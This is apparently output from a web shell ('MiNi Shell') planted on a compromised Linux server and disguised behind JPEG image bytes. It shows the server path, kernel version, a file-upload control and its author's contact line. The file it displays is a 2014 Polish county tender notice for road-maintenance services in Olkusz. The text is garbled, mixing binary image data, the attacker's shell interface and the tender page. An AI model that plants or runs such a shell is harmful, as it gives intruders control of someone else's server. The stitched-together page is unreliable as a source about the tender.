JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140219/58638-N-2014.html

<p class="kh_header"><b>Olkusz: Świadczenie usług związanych z bieżącym utrzymaniem dróg powiatowych w 2014 roku na terenie powiatu olkuskiego</b><br>
<b>Numer ogłoszenia: 58638 - 2014; data zamieszczenia: 19.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Olkuszu , ul. Mickiewicza 2, 32-300 Olkusz, woj. małopolskie, tel. 032 6430414, 6476670, faks 032 6430490.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp.olkusz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług związanych z bieżącym utrzymaniem dróg powiatowych w 2014 roku na terenie powiatu olkuskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie n/w usług związanych z bieżącym utrzymaniem dróg powiatowych w 2014 r. na terenie powiatu olkuskiego samochodami ciężarowymi i koparko - ładowarkami t.j.:
     1) holowaniu remontera1),
     2)  transporcie materiałów kamiennych1) ,
     3)  transporcie materiałów betonowych1),
     4)  transporcie gruzu betonowego i asfaltobetonowego1),
     5)  transporcie ziemi i gleby1),
     6)  transporcie zanieczyszczeń w postaci śmieci zbieranych w pasach  drogowych1),
     7)  transporcie dłużyc, karpiny, gałęzi, pni i korzeni1),
     8)  transporcie znaków drogowych oraz słupków do znaków1),
     9)  wykonaniu robót ziemnych w postaci korytowania pod nawierzchnię jezdni
          i chodników2),
    10)  ścinaniu i profilowaniu poboczy2),
   11)  oczyszczeniu rowów z namułu i kopaniu rowów2), 
   12)  oczyszczeniu jezdni z namulisk powstałych w wyniku ulewnego deszczu2), 
   13)  załadunku i rozładunku materiałów kamiennych2),
   14)  załadunku i rozładunku materiałów betonowych  ( kostki brukowej,  obrzeży, 
          krawężników, kręgów betonowych itp.)2),
   15)  załadunku i rozładunku gruzu betonowego i asfaltobetonowego2),
   16)  karczowaniu pni2), 
   17)  wykonaniu robót  niewymienionych powyżej, a związanych bezpośrednio z bieżącym  
          utrzymaniem dróg powiatowych1), 2).
Legenda:
1) - dotyczy usług świadczonych samochodem ciężarowym,
2) - dotyczy usług świadczonych koparko - ładowarką,

Część I - usługi świadczone  dla Obwodu Drogowo - Mostowego nr 1 w Olkuszu następującym sprzętem:
- samochód ciężarowy	- 1 sztuka,
- koparko - ładowarka	- 1 sztuka,
Część II - usługi świadczone  dla Obwodu Drogowo - Mostowego nr 2 w Trzyciążu następującym sprzętem:
- samochód ciężarowy	- 1 sztuka,
- koparko - ładowarka	- 1 sztuka.

Szacunkowa ilość godzin pracy oraz km jazdy została określona w załączniku nr 4 do SIWZ                 w odniesieniu do każdej z części zamówienia.
Uwaga: W przypadku zakupu przez Zamawiającego materiałów kamiennych, betonowych lub mieszanki mineralno - asfaltowej, Wykonawca za ich transport z miejsca zakupu do miejsca przeznaczenia otrzyma wynagrodzenie na podstawie faktycznej ilości przejechanych kilometrów. Pozostałe czynności opisane w przedmiocie zamówienia będą rozliczane według ilości przepracowanych godzin.

Wymagania dotyczące sprzętu:
1. Samochód ciężarowy:
    a) moc silnika minimum 260 KM,
    b) ładowność skrzyni minimum 8000 kg,
    c) skrzynia ładunkowa samowyładowcza z możliwością 3 - stronnego wyładunku,
    d) tylny zaczep z przystosowaniem do ciągnięcia przyczepy (remontera),
    e) możliwość holowania przyczepy (remontera) o dopuszczalnej masie całkowitej                    
        minimum 14000 kg,
    f) możliwość holowania remontera na przyczepie niskopodwoziowej,
    g) sygnał świetlny błyskowy koloru pomarańczowego,
    h) aktualne badania techniczne,
    i) aktualne ubezpieczenie OC.
2. Koparko - ładowarka:
    a) napęd 4x4,
    b) moc silnika minimum 70 KM,
    c) łyżka przednia otwierana o pojemności minimum 1 m3,
    d) widły do przewozu palet, młot hydrauliczny,
    e) ramię tylne teleskopowe,
    f) wyjście pod młot hydrauliczny,
    g) 3 tylne łyżki o szerokości 0,4 m, 0,6 m i gładka do rowów o szerokości min. 1,2 m,
    h) sygnał świetlny koloru pomarańczowego,
    i) aktualne ubezpieczenie OC.

Wymagania dotyczące osób obsługujących w/w sprzęt:
1. Samochód ciężarowy:
    - ważne prawo jazdy kat. C + E,
2. Koparko - ładowarka:
    - ważne uprawnienia na koparko - ładowarkę.
Wykonawca którego oferta zostanie zakwalifikowana w wyniku przetargu zobowiązany jest do wykonywania w/w usług na wskazanym Obwodzie Drogowo - Mostowym.
Zamawiający może przedysponować sprzęt na inny Obwód Drogowy.
Zamawiający przed podpisaniem umowy zastrzega sobie prawo do żądania podstawienia sprzętu zaoferowanego w ofercie w celu jego oględzin. Sprzęt należy podstawić na teren Obwodu Drogowo - Mostowego nr 1 w Olkuszu (Aleja 1000 - lecia 1a) oraz Obwodu Drogowo - Mostowego nr 2  w Trzyciążu (Trzyciąż 107A). Zamawiający ustali termin takich oględzin. Podstawienie sprzętu odbędzie się na koszt Wykonawcy. Zamawiający dopuszcza składanie ofert częściowych na jedną lub więcej części zamówienia określonych w załączniku nr 4 do SIWZ. Liczba części wynosi 2..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających na podstawie art. 67 ust. 1 pkt. 6 do 50 % wartości zamówienia podstawowego. Usługi w ramach zamówień uzupełniających będą tego samego rodzaju co usługi zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.18.10.00-0, 45.52.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku dokonana zostanie zgodnie z formułą (spełnia-nie spełnia) w oparciu o informacje zawarte w oświadczeniu o spełnianiu warunków udziału w postępowaniu złożonym według załącznika nr 2a do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku dokonana zostanie zgodnie z formułą (spełnia-nie spełnia) w oparciu o informacje zawarte w oświadczeniu o spełnianiu warunków udziału w postępowaniu złożonym według załącznika nr 2a do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku dokonana zostanie zgodnie z formułą (spełnia-nie spełnia) w oparciu o informacje zawarte w oświadczeniu o spełnianiu warunków udziału w postępowaniu złożonym według załącznika nr 2a do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku dokonana zostanie zgodnie z formułą (spełnia-nie spełnia) w oparciu o informacje zawarte w oświadczeniu o spełnianiu warunków udziału w postępowaniu złożonym według załącznika nr 2a do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku dokonana zostanie zgodnie z formułą (spełnia-nie spełnia) w oparciu o informacje zawarte w oświadczeniu o spełnianiu warunków udziału w postępowaniu złożonym według załącznika nr 2a do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może być zmieniona w stosunku do treści oferty, na podstawie, której dokonano      
         wyboru wykonawcy w poniższym zakresie:
- zmiana środka transportowego lub sprzętowego na inny, może nastąpić tylko pod warunkiem, iż zmieniany środek transportowy (sprzętowy) zostanie zastąpiony środkiem transportowym (sprzętowym) o takich samych lub lepszych parametrach technicznych, które Zamawiający określa w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp.olkusz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Olkuszu, ul. Mickiewicza 2, 32-300 Olkusz- pokój nr 92.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2014 godzina 10:30, miejsce: Starostwo Powiatowe w Olkuszu, ul. Mickiewicza 2, 32-300 Olkusz- pokój nr 51 (Kancelaria Ogólna).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi świadczone dla ODM nr 1  w Olkuszu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie n/w usług związanych z bieżącym utrzymaniem dróg powiatowych w 2014 r. na terenie powiatu olkuskiego polegających na:
     1) holowaniu remontera1),
     2)  transporcie materiałów kamiennych1) ,
     3)  transporcie materiałów betonowych1),
     4)  transporcie gruzu betonowego i asfaltobetonowego1),
     5)  transporcie ziemi i gleby1),
     6)  transporcie zanieczyszczeń w postaci śmieci zbieranych w pasach  drogowych1),
     7)  transporcie dłużyc, karpiny, gałęzi, pni i korzeni1),
     8)  transporcie znaków drogowych oraz słupków do znaków1),
     9)  wykonaniu robót ziemnych w postaci korytowania pod nawierzchnię jezdni
          i chodników2),
    10)  ścinaniu i profilowaniu poboczy2),
   11)  oczyszczeniu rowów z namułu i kopaniu rowów2), 
   12)  oczyszczeniu jezdni z namulisk powstałych w wyniku ulewnego deszczu2), 
   13)  załadunku i rozładunku materiałów kamiennych2),
   14)  załadunku i rozładunku materiałów betonowych  ( kostki brukowej,  obrzeży, 
          krawężników, kręgów betonowych itp.)2),
   15)  załadunku i rozładunku gruzu betonowego i asfaltobetonowego2),
   16)  karczowaniu pni2), 
   17)  wykonaniu robót  niewymienionych powyżej, a związanych bezpośrednio z bieżącym  
          utrzymaniem dróg powiatowych1), 2).
Legenda:
1) - dotyczy usług świadczonych samochodem ciężarowym,
2) - dotyczy usług świadczonych koparko - ładowarką,

Część I dotyczy - usług świadczonych  dla Obwodu Drogowo - Mostowego nr 1 w Olkuszu następującym sprzętem:
- samochód ciężarowy	- 1 sztuka,
- koparko - ładowarka	- 1 sztuka.
Szacunkowa ilość godzin pracy oraz km jazdy została określona w załączniku nr 4 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.18.10.00-0, 45.52.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi świadczone dla ODM nr 2 w Trzyciążu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie n/w usług związanych z bieżącym utrzymaniem dróg powiatowych w 2014 r. na terenie powiatu olkuskiego samochodami ciężarowymi i koparko - ładowarkami t.j.:
     1) holowaniu remontera1),
     2)  transporcie materiałów kamiennych1) ,
     3)  transporcie materiałów betonowych1),
     4)  transporcie gruzu betonowego i asfaltobetonowego1),
     5)  transporcie ziemi i gleby1),
     6)  transporcie zanieczyszczeń w postaci śmieci zbieranych w pasach  drogowych1),
     7)  transporcie dłużyc, karpiny, gałęzi, pni i korzeni1),
     8)  transporcie znaków drogowych oraz słupków do znaków1),
     9)  wykonaniu robót ziemnych w postaci korytowania pod nawierzchnię jezdni
          i chodników2),
    10)  ścinaniu i profilowaniu poboczy2),
   11)  oczyszczeniu rowów z namułu i kopaniu rowów2), 
   12)  oczyszczeniu jezdni z namulisk powstałych w wyniku ulewnego deszczu2), 
   13)  załadunku i rozładunku materiałów kamiennych2),
   14)  załadunku i rozładunku materiałów betonowych  ( kostki brukowej,  obrzeży, 
          krawężników, kręgów betonowych itp.)2),
   15)  załadunku i rozładunku gruzu betonowego i asfaltobetonowego2),
   16)  karczowaniu pni2), 
   17)  wykonaniu robót  niewymienionych powyżej, a związanych bezpośrednio z bieżącym  
          utrzymaniem dróg powiatowych1), 2).
Legenda:
1) - dotyczy usług świadczonych samochodem ciężarowym,
2) - dotyczy usług świadczonych koparko - ładowarką,

Część II dotyczy usług świadczonych  dla Obwodu Drogowo - Mostowego nr 2 w Trzyciążu następującym sprzętem:
- samochód ciężarowy	- 1 sztuka,
- koparko - ładowarka	- 1 sztuka.

Szacunkowa ilość godzin pracy oraz km jazdy została określona w załączniku nr 4 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.18.10.00-0, 45.52.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com